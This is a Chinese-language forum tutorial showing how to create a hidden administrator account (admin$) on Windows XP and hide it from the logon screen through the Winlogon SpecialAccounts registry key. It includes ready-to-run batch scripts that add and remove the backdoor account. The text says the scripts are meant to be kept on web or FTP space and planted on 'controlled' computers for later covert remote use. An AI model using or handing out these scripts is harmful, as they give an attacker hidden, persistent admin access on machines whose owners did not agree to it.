【技巧內容】
1.技巧用途:
在計算機中創建一個隱藏的賬戶,不被計算機的其他使用者發現,同時也可作為遠程登錄的用戶來遠控計算機或者查看計算機的磁盤信息。(在虛擬機中進行演示)
2.使用環境:
宿主機:windows xp sp3
虛擬機:Vmware workstation下的windows xp sp3
3.使用的工具:
A.系統工具:
Regedit.exe
Cmd.exe
B.自建的批處理和注冊表:
開啟賬戶及添加隱藏注冊表.bat
關閉賬戶及刪除隱藏注冊表.bat
4.過程步驟:
1.本地創建隱藏賬戶和建立隱藏“登錄時賬戶顯示”的注冊表文件。
net user admin$ admin /add ---在計算機中創建一個用戶名為admin$,密碼為admin的賬戶,此時建立的這個帶$的賬戶是隱藏的。我們可以在cmd中運行net user,可以看到我們發現不了這個用戶。打開“計算機管理”中的“本地用戶和組”--“用戶”中則可以看到存在admin$的賬戶。
net localgroup administrators admin$ /add ----將admin賬戶添加到管理員組中,便于以后對計算機進行控制。
至此,本地計算機的隱藏賬戶建立好了。
下面我們注銷計算機,在計算機的登錄界面還是可以看到這個admin$的賬戶。
那么,如何才能將登錄界面的admin$賬戶也隱藏掉呢?
此時我們可以進入注冊表中新建一個鍵,就可以將其隱藏了。鍵為:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] 中新建一個dword類型的名為admin$的鍵,其鍵值為"admin$"=dword:00000000
快速打開方法為,在注冊表編輯器regedit.exe中的菜單欄“編輯”中“查找”userlist,查找兩次就可以快速定位userlist這個鍵值了。
保存userlist下的鍵值為"yincang.reg",便于下面的批處理時使用。
注銷計算機,可以發現,此時admin$賬戶看不到了。
至此,在cmd下的net user和系統登錄界面中都看不到admin$的影子了。唯一可以看到的是計算機管理中的用戶下還是可以看到。我們說一般的用戶是不會去查看最后一個地方的,這樣我們就創建了一個相對隱藏較深的計算機賬戶。
下面我們先刪除掉以上的設置。 刪除用戶,刪除注冊表鍵值。
2.批處理編寫
創建隱藏賬戶和添加進入注冊表
“開啟賬戶及添加隱藏注冊表.bat ”
@echo off
net user admin$ admin /add >nul
net localgroup administrators admin$ /add >nul
echo Windows Registry Editor Version 5.00 >>tmp.reg >nul
echo. >>tmp.reg >nul
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >>tmp.reg >nul
echo "admin$"=dword:00000000 >>tmp.reg >nul
echo. >>tmp.reg >nul
regedit /s tmp.reg >nul
del tmp.reg >nul
刪除隱藏賬戶和刪除注冊表相關隱藏信息
“關閉賬戶及刪除隱藏注冊表.bat”
@echo off
net user admin$ /del >nul
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin$" /f >nul
3.有了以上兩個批處理文件之后,我們就可以留下它們放在自己的網絡空間上或者ftp空間中,隨時備用,適當的時候可以在受控的計算機中創建一個隱藏的賬戶,以便我們下次使用這臺受控的計算機上的資源。
4.至此,今天的課程到此結束,謝謝觀看!
QQ好友和群
QQ空間
騰訊微博
騰訊朋友
收藏
淘帖
頂
踩
